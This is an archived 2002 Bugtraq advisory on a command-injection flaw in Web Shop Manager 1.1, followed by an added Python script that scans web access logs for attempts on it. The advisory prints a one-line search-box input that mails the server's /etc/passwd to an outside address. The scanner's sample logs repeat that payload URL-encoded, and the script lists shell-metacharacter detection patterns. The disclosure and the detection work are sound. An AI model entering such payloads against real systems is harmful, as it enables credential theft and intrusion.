[26674] in bugtraq


Web Shop Manager Security Vulnerability

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Thu Aug 15 13:57:30 2002

Message-ID: <20020815101537.90792.qmail@web21307.mail.yahoo.com>
Date: Thu, 15 Aug 2002 03:15:37 -0700 (PDT)
From: Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Summary
The Web Shop Manager
(http://www.webscriptworld.com/scripts/wsm.phtml)
allows you to manage a fully functional online store
from a centralized web-based administration system. A
security vulnerability in the product allows execution
of arbitrary commands with the privileges of the
script file used by the product.

Details 
Vulnerable systems:
 * Web Shop Manager version 1.1

Exploit:
It is possible to send the server's password file to any
mail address by entering the following command in Web
Shop Manager's search box:

 |mail user@host.com < /etc/passwd
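
For defenders reviewing logs of a site that ran the affected version, the following is an added example (not part of the original post and not code from the product) that scans web access logs for search values of the form shown above. The log lines are constructed, and the script path /cgi-bin/search.cgi and the parameter name "query" are assumptions, since the post does not name them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format). The path and the
# parameter name "query" are hypothetical; the post does not give them.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Aug/2002:10:01:02 +0000] "GET /cgi-bin/search.cgi?query=garden+hose HTTP/1.0" 200 5120
192.0.2.44 - - [15/Aug/2002:10:03:17 +0000] "GET /cgi-bin/search.cgi?query=%7Cmail+user%40host.com+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 312
192.0.2.10 - - [15/Aug/2002:10:04:40 +0000] "GET /cgi-bin/search.cgi?query=nuts+%26+bolts&page=2 HTTP/1.0" 200 4801
192.0.2.51 - - [15/Aug/2002:10:06:05 +0000] "GET /cgi-bin/search.cgi?query=R%7CD+kit HTTP/1.0" 200 2210
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters a shell treats as pipes, redirections or command separators.
SHELL_META = re.compile(r"[|<>;`]|\$\(")


def classify(value):
    """Classify one URL-decoded parameter value; None means nothing suspicious."""
    if value.lstrip().startswith("|"):
        return "leading-pipe"      # the form given in the advisory
    if SHELL_META.search(value):
        return "shell-metachar"    # lower confidence, needs manual review
    return None


def scan(log_text):
    """Return (line number, client, parameter, verdict, decoded value) tuples."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qsl undoes both %XX escapes and '+' for spaces.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                findings.append((lineno, client, name, verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

If the search form submits by POST, the value does not appear in the access log, and the same classify() check has to be applied to request bodies captured elsewhere.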

 


